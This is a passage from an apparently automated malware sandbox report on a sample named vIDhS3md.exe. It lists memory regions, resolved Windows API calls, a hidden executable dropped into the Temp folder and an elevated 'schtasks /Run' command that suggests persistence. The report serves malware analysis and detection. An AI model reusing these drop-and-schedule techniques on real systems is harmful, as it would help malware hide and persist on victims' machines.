| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 1168 |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | os_pid = 0xcc4, show_window = SW_HIDE |
|
1 |
Module (164)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x74730000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x74731580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x74731500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74731560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:33 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #147: schtasks.exe
10
0
| Information | Value |
|---|---|
| ID | #147 |
| File Name | c:\windows\syswow64\schtasks.exe |
| Command Line | schtasks /Run /I /tn DSHCA |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:56, Reason: Child Process |
| Unmonitor | End Time: 00:04:59, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc7c |
| Parent PID | 0xa70 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C84
0x
C9C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000040000 | 0x00040000 | 0x0005ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x0004ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00053fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00061fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00083fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00113fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x00131fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| schtasks.exe.mui | 0x001c0000 | 0x001d2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00200000 | 0x002bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0x00400000 | 0x004e8fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x005d0000 | 0x00906fff | Memory Mapped File | r |
|
|
|
- |
| schtasks.exe | 0x01080000 | 0x010b1fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000010c0000 | 0x010c0000 | 0x050bffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x744b0000 | 0x7453bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76ce0000 | 0x76d71fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77670000 | 0x776f1fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eec0000 | 0x7eec0000 | 0x7efbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007efc0000 | 0x7efc0000 | 0x7efe2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efe5000 | 0x7efe5000 | 0x7efe7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe8000 | 0x7efe8000 | 0x7efe8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efeb000 | 0x7efeb000 | 0x7efebfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efed000 | 0x7efed000 | 0x7efeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\schtasks.exe | base_address = 0x1080000 |
|
1 | |
